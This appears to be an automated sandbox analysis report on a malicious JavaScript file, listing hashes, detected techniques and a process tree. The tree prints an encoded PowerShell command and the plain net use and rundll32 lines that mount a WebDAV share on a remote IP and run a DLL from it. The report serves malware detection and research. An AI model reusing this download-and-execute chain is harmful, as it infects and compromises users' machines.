Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17/10/2024, 18:58
Static task
static1
Behavioral task
behavioral1
Sample
1026828447112999694.js
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
1026828447112999694.js
Resource
win10v2004-20241007-en
General
-
Target
1026828447112999694.js
-
Size
168KB
-
MD5
e2ab6f5535544c6afa3d575bb0282d1e
-
SHA1
9200710aa19c71bf140457580a47f79a46b35d0b
-
SHA256
9aefb3b5e3a0727c6d96b103c432acb57c42294373bbd8d984a8aeb94659cd43
-
SHA512
7a08aa091147a1cd0e51e3d1fde78eee4e8a4b0d42ab559f127124e5bd7440d271a481b07007091faf126da3b4469494550f7b04fb0793c5629eddd97e4e5832
-
SSDEEP
1536:g9b7C1hWPf8vqOCQqAxuF3CaD8FIH73eazvu/7MFcI:g9bcWP0vFTiFB4c
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1876 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1748 wrote to memory of 1876 1748 wscript.exe 30 PID 1748 wrote to memory of 1876 1748 wscript.exe 30 PID 1748 wrote to memory of 1876 1748 wscript.exe 30 PID 1876 wrote to memory of 2116 1876 powershell.exe 32 PID 1876 wrote to memory of 2116 1876 powershell.exe 32 PID 1876 wrote to memory of 2116 1876 powershell.exe 32 PID 1876 wrote to memory of 2836 1876 powershell.exe 33 PID 1876 wrote to memory of 2836 1876 powershell.exe 33 PID 1876 wrote to memory of 2836 1876 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1026828447112999694.js1⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMwAwADIAMAA3ADIAOAA5ADEAMwAyADYAMgAzADMALgBkAGwAbAAsAEUAbgB0AHIAeQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\3⤵PID:2116
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\302072891326233.dll Entry3⤵PID:2836
-
-